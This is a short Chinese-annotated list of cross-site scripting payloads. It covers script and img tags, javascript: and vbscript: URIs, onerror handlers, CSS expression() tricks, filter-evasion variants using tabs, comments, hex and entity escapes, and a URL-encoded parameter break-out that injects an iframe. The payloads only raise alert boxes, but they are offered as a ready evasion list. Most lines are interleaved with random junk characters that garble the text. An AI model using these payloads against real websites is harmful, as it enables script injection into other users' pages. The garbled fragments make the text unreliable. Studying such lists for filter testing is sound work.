<script>alert("跨站")</script> (最常用)' J% _0 R, n$ T g0 d& [; l
<img scr=javascript:alert("跨站")></img>2 L u% E9 I$ f7 Y5 _- Y
<img scr="javascript: alert(/跨站/)></img>
/ V! ]* }9 D! \0 T% z. s% t$ w6 U; Q4 E<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)& {4 _( I5 f' ]( i
<img scr="#" onerror=alert(/跨站/)></img>$ J2 [/ P; `6 |/ W
<img scr="#" style="xss:expression(alert(/xss/));"></img> w% b# H C3 m! W! O( d
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
4 h# `" D- S* {" A* P5 g: }<img src=vbscript:msgbox ("xss")></img>' R( h3 T- s7 y* m! [( ?
<style> input {left:expression (alert('xss'))}</style>
/ w' A8 C: U6 z$ H: |% E" e<div style={left:expression (alert('xss'))}></div>' B w' I' |9 M' x( d
<div style={left:exp/* */ression (alert('xss'))}></div>
% i$ X0 }: O7 c' |<div style={left:\0065\0078ression (alert('xss'))}></div>9 {% V* h$ P5 N$ q6 y$ [
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>3 y8 N2 S& I% ^! ]; y+ O# G- C @
unicode <div style="{left:expRessioN (alert('xss'))}">1 _# \3 P( ^$ k# U9 ]
& c& z0 d6 k: s Q0 S. t
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["2 G8 _8 {$ j3 A/ U3 h" j" p0 ?
|